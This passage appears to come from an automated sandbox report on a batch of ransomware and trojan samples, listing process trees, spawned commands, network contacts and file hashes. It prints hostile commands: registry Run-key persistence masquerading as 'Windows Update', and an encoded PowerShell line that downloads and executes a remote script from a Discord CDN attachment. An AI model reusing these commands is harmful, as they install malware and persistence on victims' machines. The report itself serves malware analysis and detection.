PID 3020 wrote to memory of 4812 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe
PID 3020 wrote to memory of 1740 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe
PID 3020 wrote to memory of 1740 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe
PID 3020 wrote to memory of 1740 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe
PID 1844 wrote to memory of 5092 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe C:\Windows\SysWOW64\WScript.exe
PID 1844 wrote to memory of 5092 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe C:\Windows\SysWOW64\WScript.exe
PID 1844 wrote to memory of 5092 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe C:\Windows\SysWOW64\WScript.exe
PID 4812 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe C:\Users\Admin\AppData\Local\Temp\zbhnd.exe
PID 4812 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe C:\Users\Admin\AppData\Local\Temp\zbhnd.exe
PID 4812 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe C:\Users\Admin\AppData\Local\Temp\zbhnd.exe
PID 3020 wrote to memory of 768 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe
PID 3020 wrote to memory of 768 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe
PID 3020 wrote to memory of 768 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe
PID 5092 wrote to memory of 1192 N/A C:\Windows\SysWOW64\WScript.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\Setup.exe
PID 5092 wrote to memory of 1192 N/A C:\Windows\SysWOW64\WScript.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\Setup.exe
PID 5092 wrote to memory of 1192 N/A C:\Windows\SysWOW64\WScript.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\Setup.exe
PID 3020 wrote to memory of 4776 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-d0dc33d6db9913efe1f1dd451f467fc7d1091ee26ca49a8896acfa6cc04d742b.exe
PID 3020 wrote to memory of 4776 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-d0dc33d6db9913efe1f1dd451f467fc7d1091ee26ca49a8896acfa6cc04d742b.exe
PID 3020 wrote to memory of 4776 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-d0dc33d6db9913efe1f1dd451f467fc7d1091ee26ca49a8896acfa6cc04d742b.exe
PID 4384 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe C:\Users\Admin\AppData\Roaming\Google123.exe
PID 4384 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe C:\Users\Admin\AppData\Roaming\Google123.exe
PID 5092 wrote to memory of 3540 N/A C:\Windows\SysWOW64\WScript.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe
PID 5092 wrote to memory of 3540 N/A C:\Windows\SysWOW64\WScript.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe
PID 1192 wrote to memory of 4832 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\Setup.exe C:\Users\Admin\AppData\Local\Temp\is-2L84U.tmp\Setup.tmp
PID 1192 wrote to memory of 4832 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\Setup.exe C:\Users\Admin\AppData\Local\Temp\is-2L84U.tmp\Setup.tmp
PID 1192 wrote to memory of 4832 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\Setup.exe C:\Users\Admin\AppData\Local\Temp\is-2L84U.tmp\Setup.tmp
PID 3540 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3540 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3540 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3540 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3540 wrote to memory of 728 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3540 wrote to memory of 728 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3540 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3540 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3540 wrote to memory of 3812 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3540 wrote to memory of 3812 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3540 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3540 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3540 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3540 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3540 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3540 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe C:\Windows\SysWOW64\reg.exe
PID 1740 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe C:\Windows\SysWOW64\reg.exe
PID 1740 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe C:\Windows\SysWOW64\reg.exe
PID 768 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe C:\Windows\SysWOW64\reg.exe
PID 768 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe C:\Windows\SysWOW64\reg.exe
PID 768 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe C:\Windows\SysWOW64\reg.exe
PID 1740 wrote to memory of 5056 N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\RNSM00486.7z

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\RNSM00486\" -spe -an -ai#7zMap5264:96:7zEvent21266

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Packed.Win32.BadCrypt.gen-3e85c83f4e2c9c36a3be65b6e7c4b28783966774781dfcdf0bef387b5c15fe8b.exe

HEUR-Packed.Win32.BadCrypt.gen-3e85c83f4e2c9c36a3be65b6e7c4b28783966774781dfcdf0bef387b5c15fe8b.exe

C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe

HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe

C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe

HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe

C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe

HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe

C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe

HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1996 -ip 1996

C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe

HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 272

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\djfgkjdnbkjdfhooerkhjfjdlfkgdf.vbs"

C:\Users\Admin\AppData\Local\Temp\zbhnd.exe

"C:\Users\Admin\AppData\Local\Temp\zbhnd.exe"

C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe

HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 1996 -ip 1996

C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\Setup.exe"

C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-d0dc33d6db9913efe1f1dd451f467fc7d1091ee26ca49a8896acfa6cc04d742b.exe

HEUR-Trojan-Ransom.Win32.Blocker.vho-d0dc33d6db9913efe1f1dd451f467fc7d1091ee26ca49a8896acfa6cc04d742b.exe

C:\Users\Admin\AppData\Roaming\Google123.exe

"C:\Users\Admin\AppData\Roaming\Google123.exe"

C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe

"C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 276

C:\Users\Admin\AppData\Local\Temp\is-2L84U.tmp\Setup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-2L84U.tmp\Setup.tmp" /SL5="$4023A,3291817,140800,C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection youtube.com

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection youtube.com

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection youtube.com

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection youtube.com

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection youtube.com

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection youtube.com

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection youtube.com

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection youtube.com

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Windows Update" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe" /f

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Windows Update" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe" /f

C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe

"C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Windows Update" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\BD366504095.exe" /f

C:\Users\Admin\AppData\Roaming\BD366504095.exe

"C:\Users\Admin\AppData\Roaming\BD366504095.exe"

C:\Users\Admin\AppData\Roaming\Scegli_nome_allegato.exe

"C:\Users\Admin\AppData\Roaming\Scegli_nome_allegato.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AOAA4ADAAMgA2ADUANwA5ADYANwA2ADcANgAwADgAOAA5ADIALwA4ADgAMQA5ADAAMgAxADcANgAxADkANQAxADgANgA3ADIAOAAvAE4AZQB3AF8AVABlAHgAdABfAEQAbwBjAHUAbQBlAG4AdAAuAHQAeAB0ACcAKQA=

C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe

"C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe"

C:\Users\Admin\AppData\Roaming\BD366504095.exe

"C:\Users\Admin\AppData\Roaming\BD366504095.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 42.140.123.92.in-addr.arpa udp
US 8.8.8.8:53 2.36.159.162.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 24.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 checkip.dyndns.org udp
US 158.101.44.242:80 checkip.dyndns.org tcp
US 8.8.8.8:53 242.44.101.158.in-addr.arpa udp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 smtp.yandex.com.tr udp
RU 77.88.21.158:587 smtp.yandex.com.tr tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 233.129.159.162.in-addr.arpa udp
US 8.8.8.8:53 sunray1975.zapto.org udp
RU 77.88.21.158:587 tcp

Files

C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-d0dc33d6db9913efe1f1dd451f467fc7d1091ee26ca49a8896acfa6cc04d742b.exe

MD5 a8f2c9b1c6dc9022290900cbf27af571
SHA1 0bd9ba9ebaf967649c102989a1b28394840106ee
SHA256 d0dc33d6db9913efe1f1dd451f467fc7d1091ee26ca49a8896acfa6cc04d742b
SHA512 60f92d9829283ce05f8aaa13466d572e8772d29b699f782f37bb05d232dcf33bca883f1549e2b6ac9d211b7879042f25a973a57460548e7ba4fafbe057826d29

C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-c672b0b93ad76e1048b0f5845b869872ffac37c5f42f7f05b0dd08a0ddb688f1.exe

MD5 31cf5a53a640bc9a073cbe777a2183ce
SHA1 10941c1910e473bf0b8fb0617bf5f39bda577d81
SHA256 c672b0b93ad76e1048b0f5845b869872ffac37c5f42f7f05b0dd08a0ddb688f1
SHA512 4d59ff48d939016a001ad18819e115c9c3a83bc6d41d5ce6ff9ceb0496753e53ac61420eb061235ffac5dd3d2e84cf6f07c87db11cc151cfc96a94c4b6eea0e8

C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan.Win32.Kryptik.gen-0da5a04cdcc8fec504878f3b3062ac390b49ff6f0a304cd2e08c7b344a0aeab0.exe

MD5 7bf5be704b75c4924b5a29a8ab05ea30
SHA1 53aa3fd3f60aad9b980cb3ed0d1f169add0530b6
SHA256 0da5a04cdcc8fec504878f3b3062ac390b49ff6f0a304cd2e08c7b344a0aeab0
SHA512 be3487e110e5dd9db83b3f0cd1b6e467cf06b613a4bc19cb3bae66100d0bc827948a36c67a78fadca3f88503dbc5bf7eb931a1c4f89318cd0fe167127e5ced42

C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan.Win64.Kryptik.gen-6442c3d57a02a1469c283a3a1a170fdc31b412993de9806b2738e73501ce0e81.exe

MD5 448096c67b45deb3c7593aa88fb86b75
SHA1 c60c8cc75a3a2950dcb78fc4094007b13c7b099f
SHA256 6442c3d57a02a1469c283a3a1a170fdc31b412993de9806b2738e73501ce0e81
SHA512 042f276950948d7d7ba3f3965525cb0c64277b7f31e12742bb280e1b520dbb74274253eae748a148d68ee93eb713930bec0b7499a2e5f0202ba0b74975a8d237

C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\Trojan-Ransom.Win32.Cryptodef.aoo-fffbd669ccfaca780362d00cc3d7b165bb9f68a3902dc1fa9a099ecb706f3adc.exe

MD5 18ffed6f715aea3ba8cd567b330faf20
SHA1 8f835470057ba4f832e812fc9f58dd42c0a7acc4
SHA256 fffbd669ccfaca780362d00cc3d7b165bb9f68a3902dc1fa9a099ecb706f3adc
SHA512 c863ac250d1dac03362ce0fd9b5f3ccb0e45084e0715533dede7ab420eb7b4a7fb58228ad3d9c516352a8474ff07c205c64e7709b9d5a7ee5490bfa6e10e51ff

C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\Trojan-Ransom.Win32.GenericCryptor.czo-877fe5837cf0d0c2637ef6728da31841094501dc61257722698b38828f895f66.exe

MD5 03531048f4d9369c850888945181cf43
SHA1 1e214deb22fa4dd095d9351d91ac5563aad5e7ba
SHA256 877fe5837cf0d0c2637ef6728da31841094501dc61257722698b38828f895f66
SHA512 f312faed2f987a9da2ee145f078645825f2785ce483ded263fa3b3d6a884a5e67cad3ffde8dff4a82c67b010262926365d8f947c74dec04a26ee2703f2ecdbea

C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\Trojan-Ransom.Win32.GenericCryptor.czx-e15b06cf1255a93e42d5d558c3e65f09dac5c8564873d359da061b78be324894.exe

MD5 e3584b71a215db2c629e6e2877edd6b4
SHA1 01bee60375b7a275f818b051ddc0ddb4a8426006
SHA256 e15b06cf1255a93e42d5d558c3e65f09dac5c8564873d359da061b78be324894
SHA512 d57474c0cdf0df95b703afbfb1f801765b4fe1030eff1fc1ef971da0392474c585f0c5ce57918528d0a61fce6feaf49b0a80e614f183fede6aa74f6436ea94bf

C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\Trojan.Win32.Kryptik.bvw-f3cdb519cba210689a115f86cf1554b3edcad5e12746e109ca7e373caad24fbe.exe

MD5 b678abc39649637794c067fd5b887084
SHA1 52fd922bd1cbddc73b392611e1df9457a3fd0fd8
SHA256 f3cdb519cba210689a115f86cf1554b3edcad5e12746e109ca7e373caad24fbe
SHA512 7fdbcd04119d39eff57094b43471fd902fcdec2b7b286d1d278123d8e85c56a37b2d9451d1afbf1ff6dfbc2fc6e9d9ca256b30fd4a01ce8e3a92088ceb2585ea

memory/4372-692-0x00000130BB290000-0x00000130BB2B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yyrkyaip.tny.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4372-702-0x00000130BD800000-0x00000130BD844000-memory.dmp

memory/4372-703-0x00000130BD8D0000-0x00000130BD946000-memory.dmp

memory/1996-709-0x0000000000400000-0x0000000000402000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Packed.Win32.BadCrypt.gen-3e85c83f4e2c9c36a3be65b6e7c4b28783966774781dfcdf0bef387b5c15fe8b.exe

MD5 bd54078b9adbe209a3b2ce024ff94ba0
SHA1 583786c790eee89fff045be901be6c8a2b7a1647
SHA256 3e85c83f4e2c9c36a3be65b6e7c4b28783966774781dfcdf0bef387b5c15fe8b
SHA512 218b5869e9cf06d4b5308770011cca8f2b9ac4f8ccb77448b61c11791cd52250bddb92bdca50225747be396972e749450046d37ec8fc7161e62230ab1a10d5cf

C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe

MD5 015cb7762f15eaa2bedc61fa02486f4c
SHA1 8e152fc6a4f4c9f3226e8deca1e8ff76d15a49be
SHA256 30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23
SHA512 95e5dc63428e71e4ab395d34ab855bea751343f267567eb43c461ae1e847a3460ea27e24a303fd5275f4608a5b5bdc18c08b59a2ed112049835f7bdc4d011384

C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe

MD5 b9dee2e3d9527f4ebc3ac12a3d31fb85
SHA1 fe1bc21eeece8cea940687f5cdf0bb2ba4e12346
SHA256 806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e
SHA512 7fb6df8cb2d8550432d06df799b87e38aa3b8520b5fb3829cde5c9694a3c3cc64f90169870ae4d3ed64edb9033661c25f198c68f5c8b3efd7188cdb16cd3a274

C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe

MD5 108abda7915e7b2338376b4fc81a7e87
SHA1 816f14dbb37b0f6bbf60541bf665e43c7dc2e410
SHA256 c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d
SHA512 2ffc6165be49ae2214313f3e5c1159980f5cab363b745a35ed6d3bf2d1d504e47b4ac101adc269d382a75fe2bfccbe2b94aa6dca3c3d3d864cf291975838efb7

C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe

MD5 3876a3cdf0e2d715d4ab1cb3e4b1f056
SHA1 db205f5318852154bf64d6d1d6a5a6de7234542b
SHA256 183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20
